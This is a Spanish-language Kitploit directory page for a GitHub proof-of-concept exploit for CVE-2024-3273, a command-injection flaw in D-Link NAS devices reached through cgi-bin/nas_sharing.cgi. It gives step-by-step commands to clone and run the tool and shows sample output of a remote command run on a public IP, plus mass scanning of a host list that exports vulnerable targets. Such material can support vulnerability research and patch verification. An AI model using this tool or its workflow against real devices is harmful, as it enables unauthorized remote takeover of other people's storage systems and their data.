Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-3273 — Exploit para CVE-2024-3273, soporta hosts individuales y múltiples | Kitploit
Herramientas/GitHubGitHub/adhikara13/cve-2024-3273
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed Teaming
GitHubadhikara13/cve-2024-3273

CVE-2024-3273

Exploit para CVE-2024-3273, soporta hosts individuales y múltiples

Ver Repositorio
131hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-3273 Prueba de concepto (PoC)

Este repositorio contiene una prueba de concepto (PoC) para CVE-2024-3273, una vulnerabilidad de seguridad descubierta en dispositivos NAS de D-Link. La vulnerabilidad permite a los atacantes ejecutar comandos arbitrarios en dispositivos vulnerables.

Descripción

CVE-2024-3273 es una vulnerabilidad en dispositivos NAS de D-Link que permite a atacantes remotos ejecutar comandos arbitrarios mediante una solicitud HTTP manipulada al endpoint cgi-bin/nas_sharing.cgi.

Esta PoC demuestra cómo se puede explotar la vulnerabilidad para ejecutar comandos en dispositivos NAS de D-Link vulnerables.

Requisitos

  • Python 3.x
  • Librería requests

Uso

  1. Clona este repositorio:

    root@kitploit:~
    git clone https://github.com/adhikara13/CVE-2024-3273.git
    
  2. Navega al directorio del repositorio:

    root@kitploit:~
    cd CVE-2024-3273
    
  3. Ejecuta la PoC:

    root@kitploit:~
    python main.py
    
  4. Sigue las instrucciones en pantalla para elegir el dispositivo objetivo:

    • Opción 1: Host único (1): Introduce los datos de un único dispositivo objetivo, incluyendo la dirección IP del host y el comando a ejecutar.
    • Opción 2: Varios hosts (2): Proporciona un archivo que contenga varios dispositivos objetivo en el formato host:port, y elige si deseas exportar los hosts vulnerables a vulnerables.txt.

Ejemplo

root@kitploit:~
┏┓┓┏┏┓  ┏┓┏┓┏┓┏┓  ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛  ┗━┗┛┗━┗╋  ┗┛┗━ ╹┗┛

Choose an option (1: Single Host, 2: Multiple Hosts): 1
Enter the host: 114.32.179.200
Enter the command to run: ls
Response from 114.32.179.200:
box.cgi
codepage_mgr.cgi
download_mgr.cgi
dropbox.cgi
folder_tree.cgi

┏┓┓┏┏┓  ┏┓┏┓┏┓┏┓  ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛  ┗━┗┛┗━┗╋  ┗┛┗━ ╹┗┛

Choose an option (1: Single Host, 2: Multiple Hosts): 2
Enter the file path containing hosts: list.txt
Export vulnerable host to vulnerables.txt? (y/n): y
Connection error for host 87.205.188.21:9290.
Connection error for host 186.212.112.141:8081.
Host 124.120.263.149:8032 is vulnerable.

Descargo de responsabilidad

Esta PoC es solo para fines educativos y de investigación. Úsala de manera responsable y únicamente en dispositivos para los que tengas autorización de prueba.

Contribuciones

¡Las contribuciones son bienvenidas! Si encuentras algún problema o mejora, no dudes en abrir un issue o crear una pull request.

Descargar herramienta